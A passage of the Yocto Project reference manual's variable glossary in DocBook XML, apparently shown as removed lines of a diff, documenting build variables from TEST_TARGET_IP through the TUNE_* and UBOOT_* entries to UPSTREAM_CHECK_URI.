- The hardware can be on the network or it can be
- a device running an image on QEMU.
- You must also set
- <link linkend='var-TEST_TARGET_IP'><filename>TEST_TARGET_IP</filename></link>
- when you use "simpleremote".
- <note>
- This argument is defined in
- <filename>meta/lib/oeqa/controllers/simpleremote.py</filename>.
- </note>
- </para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- For information on running tests on hardware, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#hardware-image-enabling-tests'>Enabling Runtime Tests on Hardware</ulink>"
- section in the Yocto Project Development Tasks Manual.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-TEST_TARGET_IP'><glossterm>TEST_TARGET_IP</glossterm>
- <info>
- TEST_TARGET_IP[doc] = "The IP address of your hardware under test."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The IP address of your hardware under test.
- The <filename>TEST_TARGET_IP</filename> variable has no
- effect when
- <link linkend='var-TEST_TARGET'><filename>TEST_TARGET</filename></link>
- is set to "qemu".
- </para>
-
- <para>
- When you specify the IP address, you can also include a
- port.
- Here is an example:
- <literallayout class='monospaced'>
- TEST_TARGET_IP = "192.168.1.4:2201"
- </literallayout>
- Specifying a port is useful when SSH is started on a
- non-standard port or in cases when your hardware under test
- is behind a firewall or network that is not directly
- accessible from your host and you need to do port address
- translation.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-TEST_SUITES'><glossterm>TEST_SUITES</glossterm>
- <info>
- TEST_SUITES[doc] = "An ordered list of tests (modules) to run against an image when performing automated runtime testing."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- An ordered list of tests (modules) to run against
- an image when performing automated runtime testing.
- </para>
-
- <para>
- The OpenEmbedded build system provides a core set of tests
- that can be used against images.
- <note>
- Currently, there is only support for running these tests
- under QEMU.
- </note>
- Tests include <filename>ping</filename>,
- <filename>ssh</filename>, <filename>df</filename> among
- others.
- You can add your own tests to the list of tests by
- appending <filename>TEST_SUITES</filename> as follows:
- <literallayout class='monospaced'>
- TEST_SUITES_append = " <replaceable>mytest</replaceable>"
- </literallayout>
- Alternatively, you can provide the "auto" option to
- have all applicable tests run against the image.
- <literallayout class='monospaced'>
- TEST_SUITES_append = " auto"
- </literallayout>
- Using this option causes the build system to automatically
- run tests that are applicable to the image.
- Tests that are not applicable are skipped.
- </para>
-
- <para>
- The order in which tests are run is important.
- Tests that depend on another test must appear later in the
- list than the test on which they depend.
- For example, if you append the list of tests with two
- tests (<filename>test_A</filename> and
- <filename>test_B</filename>) where
- <filename>test_B</filename> is dependent on
- <filename>test_A</filename>, then you must order the tests
- as follows:
- <literallayout class='monospaced'>
- TEST_SUITES = " test_A test_B"
- </literallayout>
- </para>
-
- <para>
- For more information on testing images, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#performing-automated-runtime-testing'>Performing Automated Runtime Testing</ulink>"
- section in the Yocto Project Development Tasks Manual.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-TESTIMAGE_AUTO'><glossterm>TESTIMAGE_AUTO</glossterm>
- <info>
- TESTIMAGE_AUTO[doc] = "Enables automatic testing of an image once it is built."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Automatically runs the series of automated tests for
- images when an image is successfully built.
- Setting <filename>TESTIMAGE_AUTO</filename> to "1"
- causes any image that successfully builds to automatically
- boot under QEMU.
- Using the variable also adds in dependencies so that any
- SDK for which testing is requested is automatically built
- first.
- </para>
-
- <para>
- These tests are written in Python making use of the
- <filename>unittest</filename> module, and the majority of
- them run commands on the target system over
- <filename>ssh</filename>.
- You can set this variable to "1" in your
- <filename>local.conf</filename> file in the
- <link linkend='build-directory'>Build Directory</link>
- to have the OpenEmbedded build system automatically run
- these tests after an image successfully builds:
- <literallayout class='monospaced'>
- TESTIMAGE_AUTO = "1"
- </literallayout>
- For more information on enabling, running, and writing
- these tests, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#performing-automated-runtime-testing'>Performing Automated Runtime Testing</ulink>"
- section in the Yocto Project Development Tasks Manual and
- the
- "<link linkend='ref-classes-testimage*'><filename>testimage*.bbclass</filename></link>"
- section.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-THISDIR'><glossterm>THISDIR</glossterm>
- <info>
- THISDIR[doc] = "The directory in which the file BitBake is currently parsing is located."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The directory in which the file BitBake is currently
- parsing is located.
- Do not manually set this variable.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-TIME'><glossterm>TIME</glossterm>
- <info>
- TIME[doc] = "The time the build was started using HMS format."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The time the build was started.
- Times appear using the hour, minute, and second (HMS)
- format (e.g. "140159" for one minute and fifty-nine
- seconds past 1400 hours).
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-TMPDIR'><glossterm>TMPDIR</glossterm>
- <info>
- TMPDIR[doc] = "The temporary directory the OpenEmbedded build system uses when it does its work building images. By default, the TMPDIR variable is named tmp within the Build Directory."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- This variable is the base directory the OpenEmbedded
- build system uses for all build output and intermediate
- files (other than the shared state cache).
- By default, the <filename>TMPDIR</filename> variable points
- to <filename>tmp</filename> within the
- <link linkend='build-directory'>Build Directory</link>.
- </para>
-
- <para>
- If you want to establish this directory in a location other
- than the default, you can uncomment and edit the following
- statement in the
- <filename>conf/local.conf</filename> file in the
- <link linkend='source-directory'>Source Directory</link>:
- <literallayout class='monospaced'>
- #TMPDIR = "${TOPDIR}/tmp"
- </literallayout>
- An example use for this scenario is to set
- <filename>TMPDIR</filename> to a local disk, which does
- not use NFS, while having the Build Directory use NFS.
- </para>
-
- <para>
- The filesystem used by <filename>TMPDIR</filename> must
- have standard filesystem semantics (i.e. mixed-case files
- are unique, POSIX file locking, and persistent inodes).
- Due to various issues with NFS and bugs in some
- implementations, NFS does not meet this minimum
- requirement.
- Consequently, <filename>TMPDIR</filename> cannot be on
- NFS.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-TOOLCHAIN_HOST_TASK'><glossterm>TOOLCHAIN_HOST_TASK</glossterm>
- <info>
- TOOLCHAIN_HOST_TASK[doc] = "This variable lists packages the OpenEmbedded build system uses when building an SDK, which contains a cross-development environment."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- This variable lists packages the OpenEmbedded build system
- uses when building an SDK, which contains a
- cross-development environment.
- The packages specified by this variable are part of the
- toolchain set that runs on the
- <link linkend='var-SDKMACHINE'><filename>SDKMACHINE</filename></link>,
- and each package should usually have the prefix
- <filename>nativesdk-</filename>.
- For example, consider the following command when
- building an SDK:
- <literallayout class='monospaced'>
- $ bitbake -c populate_sdk <replaceable>imagename</replaceable>
- </literallayout>
- In this case, a default list of packages is set in this
- variable, but you can add additional packages to the list.
- See the
- "<ulink url='&YOCTO_DOCS_SDK_URL;#sdk-adding-individual-packages'>Adding Individual Packages to the Standard SDK</ulink>"
- section in the Yocto Project Application Development and
- the Extensible Software Development Kit (eSDK) manual
- for more information.
- </para>
-
- <para>
- For background information on cross-development toolchains
- in the Yocto Project development environment, see the
- "<ulink url='&YOCTO_DOCS_OM_URL;#cross-development-toolchain-generation'>Cross-Development Toolchain Generation</ulink>"
- section in the Yocto Project Overview and Concepts Manual.
- For information on setting up a cross-development
- environment, see the
- <ulink url='&YOCTO_DOCS_SDK_URL;'>Yocto Project Application Development and the Extensible Software Development Kit (eSDK)</ulink>
- manual.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-TOOLCHAIN_OUTPUTNAME'><glossterm>TOOLCHAIN_OUTPUTNAME</glossterm>
- <info>
- TOOLCHAIN_OUTPUTNAME[doc] = "Defines the name used for the toolchain output."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- This variable defines the name used for the toolchain
- output.
- The
- <link linkend='ref-classes-populate-sdk-*'><filename>populate_sdk_base</filename></link>
- class sets the
- <filename>TOOLCHAIN_OUTPUTNAME</filename> variable as
- follows:
- <literallayout class='monospaced'>
- TOOLCHAIN_OUTPUTNAME ?= "${SDK_NAME}-toolchain-${SDK_VERSION}"
- </literallayout>
- See the
- <link linkend='var-SDK_NAME'><filename>SDK_NAME</filename></link>
- and
- <link linkend='var-SDK_VERSION'><filename>SDK_VERSION</filename></link>
- variables for additional information.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-TOOLCHAIN_TARGET_TASK'><glossterm>TOOLCHAIN_TARGET_TASK</glossterm>
- <info>
- TOOLCHAIN_TARGET_TASK[doc] = "This variable lists packages the OpenEmbedded build system uses when it creates the target part of an SDK, which includes libraries and headers."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- This variable lists packages the OpenEmbedded build system
- uses when it creates the target part of an SDK
- (i.e. the part built for the target hardware), which
- includes libraries and headers.
- Use this variable to add individual packages to the
- part of the SDK that runs on the target.
- See the
- "<ulink url='&YOCTO_DOCS_SDK_URL;#sdk-adding-individual-packages'>Adding Individual Packages to the Standard SDK</ulink>"
- section in the Yocto Project Application Development and
- the Extensible Software Development Kit (eSDK) manual for
- more information.
- </para>
-
- <para>
- For background information on cross-development toolchains
- in the Yocto Project development environment, see the
- "<ulink url='&YOCTO_DOCS_OM_URL;#cross-development-toolchain-generation'>Cross-Development Toolchain Generation</ulink>"
- section in the Yocto Project Overview and Concepts Manual.
- For information on setting up a cross-development
- environment, see the
- <ulink url='&YOCTO_DOCS_SDK_URL;'>Yocto Project Application Development and the Extensible Software Development Kit (eSDK)</ulink>
- manual.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-TOPDIR'><glossterm>TOPDIR</glossterm>
- <info>
- TOPDIR[doc] = "The Build Directory. BitBake automatically sets this variable. The OpenEmbedded build system uses the Build Directory when building images."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The top-level
- <link linkend='build-directory'>Build Directory</link>.
- BitBake automatically sets this variable when you
- initialize your build environment using
- <link linkend='structure-core-script'><filename>&OE_INIT_FILE;</filename></link>.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-TRANSLATED_TARGET_ARCH'><glossterm>TRANSLATED_TARGET_ARCH</glossterm>
- <info>
- TRANSLATED_TARGET_ARCH[doc] = "A sanitized version of TARGET_ARCH. This variable is used where the architecture is needed in a value where underscores are not allowed."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- A sanitized version of
- <link linkend='var-TARGET_ARCH'><filename>TARGET_ARCH</filename></link>.
- This variable is used where the architecture is needed in
- a value where underscores are not allowed, for example
- within package filenames.
- In this case, dash characters replace any underscore
- characters used in <filename>TARGET_ARCH</filename>.
- </para>
-
- <para>
- Do not edit this variable.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-TUNE_ARCH'><glossterm>TUNE_ARCH</glossterm>
- <info>
- TUNE_ARCH[doc] = "The GNU canonical architecture for a specific architecture (i.e. arm, armeb, mips, mips64, and so forth)."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The GNU canonical architecture for a specific architecture
- (i.e. <filename>arm</filename>,
- <filename>armeb</filename>,
- <filename>mips</filename>,
- <filename>mips64</filename>, and so forth).
- BitBake uses this value to setup configuration.
- </para>
-
- <para>
- <filename>TUNE_ARCH</filename> definitions are specific to
- a given architecture.
- The definitions can be a single static definition, or
- can be dynamically adjusted.
- You can see details for a given CPU family by looking at
- the architecture's <filename>README</filename> file.
- For example, the
- <filename>meta/conf/machine/include/mips/README</filename>
- file in the
- <link linkend='source-directory'>Source Directory</link>
- provides information for <filename>TUNE_ARCH</filename>
- specific to the <filename>mips</filename> architecture.
- </para>
-
- <para>
- <filename>TUNE_ARCH</filename> is tied closely to
- <link linkend='var-TARGET_ARCH'><filename>TARGET_ARCH</filename></link>,
- which defines the target machine's architecture.
- The BitBake configuration file
- (<filename>meta/conf/bitbake.conf</filename>) sets
- <filename>TARGET_ARCH</filename> as follows:
- <literallayout class='monospaced'>
- TARGET_ARCH = "${TUNE_ARCH}"
- </literallayout>
- </para>
-
- <para>
- The following list, which is by no means complete since
- architectures are configurable, shows supported machine
- architectures:
- <literallayout class='monospaced'>
- arm
- i586
- x86_64
- powerpc
- powerpc64
- mips
- mipsel
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-TUNE_ASARGS'><glossterm>TUNE_ASARGS</glossterm>
- <info>
- TUNE_ASARGS[doc] = "Specifies architecture-specific assembler flags for the target system."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies architecture-specific assembler flags for
- the target system.
- The set of flags is based on the selected tune features.
- <filename>TUNE_ASARGS</filename> is set using
- the tune include files, which are typically under
- <filename>meta/conf/machine/include/</filename> and are
- influenced through
- <link linkend='var-TUNE_FEATURES'><filename>TUNE_FEATURES</filename></link>.
- For example, the
- <filename>meta/conf/machine/include/x86/arch-x86.inc</filename>
- file defines the flags for the x86 architecture as follows:
- <literallayout class='monospaced'>
- TUNE_ASARGS += "${@bb.utils.contains("TUNE_FEATURES", "mx32", "-x32", "", d)}"
- </literallayout>
- <note>
- Board Support Packages (BSPs) select the tune.
- The selected tune, in turn, affects the tune variables
- themselves (i.e. the tune can supply its own
- set of flags).
- </note>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-TUNE_CCARGS'><glossterm>TUNE_CCARGS</glossterm>
- <info>
- TUNE_CCARGS[doc] = "Specifies architecture-specific C compiler flags for the target system."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies architecture-specific C compiler flags for
- the target system.
- The set of flags is based on the selected tune features.
- <filename>TUNE_CCARGS</filename> is set using
- the tune include files, which are typically under
- <filename>meta/conf/machine/include/</filename> and are
- influenced through
- <link linkend='var-TUNE_FEATURES'><filename>TUNE_FEATURES</filename></link>.
- <note>
- Board Support Packages (BSPs) select the tune.
- The selected tune, in turn, affects the tune variables
- themselves (i.e. the tune can supply its own
- set of flags).
- </note>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-TUNE_LDARGS'><glossterm>TUNE_LDARGS</glossterm>
- <info>
- TUNE_LDARGS[doc] = "Specifies architecture-specific linker flags for the target system."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies architecture-specific linker flags for
- the target system.
- The set of flags is based on the selected tune features.
- <filename>TUNE_LDARGS</filename> is set using
- the tune include files, which are typically under
- <filename>meta/conf/machine/include/</filename> and are
- influenced through
- <link linkend='var-TUNE_FEATURES'><filename>TUNE_FEATURES</filename></link>.
- For example, the
- <filename>meta/conf/machine/include/x86/arch-x86.inc</filename>
- file defines the flags for the x86 architecture as follows:
- <literallayout class='monospaced'>
- TUNE_LDARGS += "${@bb.utils.contains("TUNE_FEATURES", "mx32", "-m elf32_x86_64", "", d)}"
- </literallayout>
- <note>
- Board Support Packages (BSPs) select the tune.
- The selected tune, in turn, affects the tune variables
- themselves (i.e. the tune can supply its own
- set of flags).
- </note>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-TUNE_FEATURES'><glossterm>TUNE_FEATURES</glossterm>
- <info>
- TUNE_FEATURES[doc] = "Features used to "tune" a compiler for optimal use given a specific processor."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Features used to "tune" a compiler for optimal use
- given a specific processor.
- The features are defined within the tune files and allow
- arguments (i.e. <filename>TUNE_*ARGS</filename>) to be
- dynamically generated based on the features.
- </para>
-
- <para>
- The OpenEmbedded build system verifies the features
- to be sure they are not conflicting and that they are
- supported.
- </para>
-
- <para>
- The BitBake configuration file
- (<filename>meta/conf/bitbake.conf</filename>) defines
- <filename>TUNE_FEATURES</filename> as follows:
- <literallayout class='monospaced'>
- TUNE_FEATURES ??= "${TUNE_FEATURES_tune-${DEFAULTTUNE}}"
- </literallayout>
- See the
- <link linkend='var-DEFAULTTUNE'><filename>DEFAULTTUNE</filename></link>
- variable for more information.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-TUNE_PKGARCH'><glossterm>TUNE_PKGARCH</glossterm>
- <info>
- TUNE_PKGARCH[doc] = "The package architecture understood by the packaging system to define the architecture, ABI, and tuning of output packages."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The package architecture understood by the packaging
- system to define the architecture, ABI, and tuning of
- output packages.
- The specific tune is defined using the "_tune" override
- as follows:
- <literallayout class='monospaced'>
- TUNE_PKGARCH_tune-<replaceable>tune</replaceable> = "<replaceable>tune</replaceable>"
- </literallayout>
- </para>
-
- <para>
- These tune-specific package architectures are defined in
- the machine include files.
- Here is an example of the "core2-32" tuning as used
- in the
- <filename>meta/conf/machine/include/tune-core2.inc</filename>
- file:
- <literallayout class='monospaced'>
- TUNE_PKGARCH_tune-core2-32 = "core2-32"
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-TUNEABI'><glossterm>TUNEABI</glossterm>
- <info>
- TUNEABI[doc] = "An underlying ABI used by a particular tuning in a given toolchain layer. This feature allows providers using prebuilt libraries to check compatibility of a tuning against their selection of libraries."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- An underlying Application Binary Interface (ABI) used by
- a particular tuning in a given toolchain layer.
- Providers that use prebuilt libraries can use the
- <filename>TUNEABI</filename>,
- <link linkend='var-TUNEABI_OVERRIDE'><filename>TUNEABI_OVERRIDE</filename></link>,
- and
- <link linkend='var-TUNEABI_WHITELIST'><filename>TUNEABI_WHITELIST</filename></link>
- variables to check compatibility of tunings against their
- selection of libraries.
- </para>
-
- <para>
- If <filename>TUNEABI</filename> is undefined, then every
- tuning is allowed.
- See the
- <link linkend='ref-classes-sanity'><filename>sanity</filename></link>
- class to see how the variable is used.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-TUNEABI_OVERRIDE'><glossterm>TUNEABI_OVERRIDE</glossterm>
- <info>
- TUNEABI_OVERRIDE[doc] = "If set, ignores TUNEABI_WHITELIST."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- If set, the OpenEmbedded system ignores the
- <link linkend='var-TUNEABI_WHITELIST'><filename>TUNEABI_WHITELIST</filename></link>
- variable.
- Providers that use prebuilt libraries can use the
- <filename>TUNEABI_OVERRIDE</filename>,
- <filename>TUNEABI_WHITELIST</filename>,
- and
- <link linkend='var-TUNEABI'><filename>TUNEABI</filename></link>
- variables to check compatibility of a tuning against their
- selection of libraries.
- </para>
-
- <para>
- See the
- <link linkend='ref-classes-sanity'><filename>sanity</filename></link>
- class to see how the variable is used.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-TUNEABI_WHITELIST'><glossterm>TUNEABI_WHITELIST</glossterm>
- <info>
- TUNEABI_WHITELIST[doc] = "A whitelist of permissible TUNEABI values. If the variable is not set, all values are allowed."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- A whitelist of permissible
- <link linkend='var-TUNEABI'><filename>TUNEABI</filename></link>
- values.
- If <filename>TUNEABI_WHITELIST</filename> is not set,
- all tunes are allowed.
- Providers that use prebuilt libraries can use the
- <filename>TUNEABI_WHITELIST</filename>,
- <link linkend='var-TUNEABI_OVERRIDE'><filename>TUNEABI_OVERRIDE</filename></link>,
- and <filename>TUNEABI</filename> variables to check
- compatibility of a tuning against their selection of
- libraries.
- </para>
-
- <para>
- See the
- <link linkend='ref-classes-sanity'><filename>sanity</filename></link>
- class to see how the variable is used.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-TUNECONFLICTS'><glossterm>TUNECONFLICTS[<replaceable>feature</replaceable>]</glossterm>
- <info>
- TUNECONFLICTS[doc] = "Specifies CPU or Application Binary Interface (ABI) tuning features that conflict with specified feature."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies CPU or Application Binary Interface (ABI)
- tuning features that conflict with <replaceable>feature</replaceable>.
- </para>
-
- <para>
- Known tuning conflicts are specified in the machine include
- files in the
- <link linkend='source-directory'>Source Directory</link>.
- Here is an example from the
- <filename>meta/conf/machine/include/mips/arch-mips.inc</filename>
- include file that lists the "o32" and "n64" features as
- conflicting with the "n32" feature:
- <literallayout class='monospaced'>
- TUNECONFLICTS[n32] = "o32 n64"
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-TUNEVALID'><glossterm>TUNEVALID[<replaceable>feature</replaceable>]</glossterm>
- <info>
- TUNEVALID[doc] = "Descriptions, stored as flags, of valid tuning features."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies a valid CPU or Application Binary Interface (ABI)
- tuning feature.
- The specified feature is stored as a flag.
- Valid features are specified in the machine include files
- (e.g. <filename>meta/conf/machine/include/arm/arch-arm.inc</filename>).
- Here is an example from that file:
- <literallayout class='monospaced'>
- TUNEVALID[bigendian] = "Enable big-endian mode."
- </literallayout>
- </para>
-
- <para>
- See the machine include files in the
- <link linkend='source-directory'>Source Directory</link>
- for these features.
- </para>
- </glossdef>
- </glossentry>
-
- </glossdiv>
-
- <glossdiv id='var-glossary-u'><title>U</title>
-
- <glossentry id='var-UBOOT_CONFIG'><glossterm>UBOOT_CONFIG</glossterm>
- <info>
- UBOOT_CONFIG[doc] = "Configures the UBOOT_MACHINE and can also define IMAGE_FSTYPES for individual cases."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Configures the
- <link linkend='var-UBOOT_MACHINE'><filename>UBOOT_MACHINE</filename></link>
- and can also define
- <link linkend='var-IMAGE_FSTYPES'><filename>IMAGE_FSTYPES</filename></link>
- for individual cases.
- </para>
-
- <para>
- Following is an example from the
- <filename>meta-fsl-arm</filename> layer.
- <literallayout class='monospaced'>
- UBOOT_CONFIG ??= "sd"
- UBOOT_CONFIG[sd] = "mx6qsabreauto_config,sdcard"
- UBOOT_CONFIG[eimnor] = "mx6qsabreauto_eimnor_config"
- UBOOT_CONFIG[nand] = "mx6qsabreauto_nand_config,ubifs"
- UBOOT_CONFIG[spinor] = "mx6qsabreauto_spinor_config"
- </literallayout>
- In this example, "sd" is selected as the configuration
- of the possible four for the
- <filename>UBOOT_MACHINE</filename>.
- The "sd" configuration defines "mx6qsabreauto_config"
- as the value for <filename>UBOOT_MACHINE</filename>, while
- the "sdcard" specifies the
- <filename>IMAGE_FSTYPES</filename> to use for the U-boot
- image.
- </para>
-
- <para>
- For more information on how the
- <filename>UBOOT_CONFIG</filename> is handled, see the
- <ulink url='http://git.yoctoproject.org/cgit/cgit.cgi/poky/tree/meta/classes/uboot-config.bbclass'><filename>uboot-config</filename></ulink>
- class.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-UBOOT_ENTRYPOINT'><glossterm>UBOOT_ENTRYPOINT</glossterm>
- <info>
- UBOOT_ENTRYPOINT[doc] = "Specifies the entry point for the U-Boot image."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the entry point for the U-Boot image.
- During U-Boot image creation, the
- <filename>UBOOT_ENTRYPOINT</filename> variable is passed
- as a command-line parameter to the
- <filename>uboot-mkimage</filename> utility.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-UBOOT_LOADADDRESS'><glossterm>UBOOT_LOADADDRESS</glossterm>
- <info>
- UBOOT_LOADADDRESS[doc] = "Specifies the load address for the U-Boot image."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the load address for the U-Boot image.
- During U-Boot image creation, the
- <filename>UBOOT_LOADADDRESS</filename> variable is passed
- as a command-line parameter to the
- <filename>uboot-mkimage</filename> utility.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-UBOOT_LOCALVERSION'><glossterm>UBOOT_LOCALVERSION</glossterm>
- <info>
- UBOOT_LOCALVERSION[doc] = "Appends a string to the name of the local version of the U-Boot image."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Appends a string to the name of the local version of the
- U-Boot image.
- For example, assuming the version of the U-Boot image
- built was "2013.10", the full version string reported by
- U-Boot would be "2013.10-yocto" given the following
- statement:
- <literallayout class='monospaced'>
- UBOOT_LOCALVERSION = "-yocto"
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-UBOOT_MACHINE'><glossterm>UBOOT_MACHINE</glossterm>
- <info>
- UBOOT_MACHINE[doc] = "Specifies the value passed on the make command line when building a U-Boot image."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the value passed on the
- <filename>make</filename> command line when building
- a U-Boot image.
- The value indicates the target platform configuration.
- You typically set this variable from the machine
- configuration file (i.e.
- <filename>conf/machine/<replaceable>machine_name</replaceable>.conf</filename>).
- </para>
-
- <para>
- Please see the "Selection of Processor Architecture and
- Board Type" section in the U-Boot README for valid values
- for this variable.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-UBOOT_MAKE_TARGET'><glossterm>UBOOT_MAKE_TARGET</glossterm>
- <info>
- UBOOT_MAKE_TARGET[doc] = "Specifies the target called in the Makefile."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the target called in the
- <filename>Makefile</filename>.
- The default target is "all".
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-UBOOT_SUFFIX'><glossterm>UBOOT_SUFFIX</glossterm>
- <info>
- UBOOT_SUFFIX[doc] = "Points to the generated U-Boot extension."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Points to the generated U-Boot extension.
- For example, <filename>u-boot.sb</filename> has a
- <filename>.sb</filename> extension.
- </para>
-
- <para>
- The default U-Boot extension is
- <filename>.bin</filename>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-UBOOT_TARGET'><glossterm>UBOOT_TARGET</glossterm>
- <info>
- UBOOT_TARGET[doc] = "Specifies the target used for building U-Boot."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the target used for building U-Boot.
- The target is passed directly as part of the "make" command
- (e.g. SPL and AIS).
- If you do not specifically set this variable, the
- OpenEmbedded build process passes and uses "all" for the
- target during the U-Boot building process.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-UNKNOWN_CONFIGURE_WHITELIST'><glossterm>UNKNOWN_CONFIGURE_WHITELIST</glossterm>
- <info>
- UNKNOWN_CONFIGURE_WHITELIST[doc] = "Specifies a list of options that, if reported by the configure script as being invalid, should not generate a warning during the do_configure task."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies a list of options that, if reported by the
- configure script as being invalid, should not generate a
- warning during the
- <link linkend='ref-tasks-configure'><filename>do_configure</filename></link>
- task.
- Normally, invalid configure options are simply not passed
- to the configure script (e.g. should be removed from
- <link linkend='var-EXTRA_OECONF'><filename>EXTRA_OECONF</filename></link>
- or
- <link linkend='var-PACKAGECONFIG_CONFARGS'><filename>PACKAGECONFIG_CONFARGS</filename></link>).
- However, common options, for example, exist that are passed
- to all configure scripts at a class level that might not
- be valid for some configure scripts.
- It follows that no benefit exists in seeing a warning about
- these options.
- For these cases, the options are added to
- <filename>UNKNOWN_CONFIGURE_WHITELIST</filename>.
- </para>
-
- <para>
- The configure arguments check that uses
- <filename>UNKNOWN_CONFIGURE_WHITELIST</filename> is part
- of the
- <link linkend='ref-classes-insane'><filename>insane</filename></link>
- class and is only enabled if the recipe inherits the
- <link linkend='ref-classes-autotools'><filename>autotools</filename></link>
- class.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-UPDATERCPN'><glossterm>UPDATERCPN</glossterm>
- <info>
- UPDATERCPN[doc] = "Specifies the package that contains the initscript that is enabled."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- For recipes inheriting the
- <link linkend='ref-classes-update-rc.d'><filename>update-rc.d</filename></link>
- class, <filename>UPDATERCPN</filename> specifies
- the package that contains the initscript that is
- enabled.
- </para>
-
- <para>
- The default value is "${PN}".
- Given that almost all recipes that install initscripts
- package them in the main package for the recipe, you
- rarely need to set this variable in individual recipes.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-UPSTREAM_CHECK_GITTAGREGEX'><glossterm>UPSTREAM_CHECK_GITTAGREGEX</glossterm>
- <info>
- UPSTREAM_CHECK_GITTAGREGEX[doc] = "Filters relevant Git tags when fetching source from an upstream Git repository."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- You can perform a per-recipe check for what the latest
- upstream source code version is by calling
- <filename>bitbake -c checkpkg</filename> <replaceable>recipe</replaceable>.
- If the recipe source code is provided from Git
- repositories, the OpenEmbedded build system determines the
- latest upstream version by picking the latest tag from the
- list of all repository tags.
- </para>
-
- <para>
- You can use the
- <filename>UPSTREAM_CHECK_GITTAGREGEX</filename>
- variable to provide a regular expression to filter only the
- relevant tags should the default filter not work
- correctly.
- <literallayout class='monospaced'>
- UPSTREAM_CHECK_GITTAGREGEX = "git_tag_regex"
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-UPSTREAM_CHECK_REGEX'><glossterm>UPSTREAM_CHECK_REGEX</glossterm>
- <info>
- UPSTREAM_CHECK_REGEX[doc] = "The regular expression the package checking system uses to parse the page pointed to by UPSTREAM_CHECK_URI."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Use the <filename>UPSTREAM_CHECK_REGEX</filename> variable
- to specify a different regular expression instead of the
- default one when the package checking system is parsing
- the page found using
- <link linkend='var-UPSTREAM_CHECK_URI'><filename>UPSTREAM_CHECK_URI</filename></link>.
- <literallayout class='monospaced'>
- UPSTREAM_CHECK_REGEX = "package_regex"
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-UPSTREAM_CHECK_URI'><glossterm>UPSTREAM_CHECK_URI</glossterm>
- <info>
- UPSTREAM_CHECK_URI[doc] = "The URL used by the package checking system to get the latest version of the package when source files are fetched from an upstream Git repository."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- You can perform a per-recipe check for what the latest
- upstream source code version is by calling
- <filename>bitbake -c checkpkg</filename> <replaceable>recipe</replaceable>.
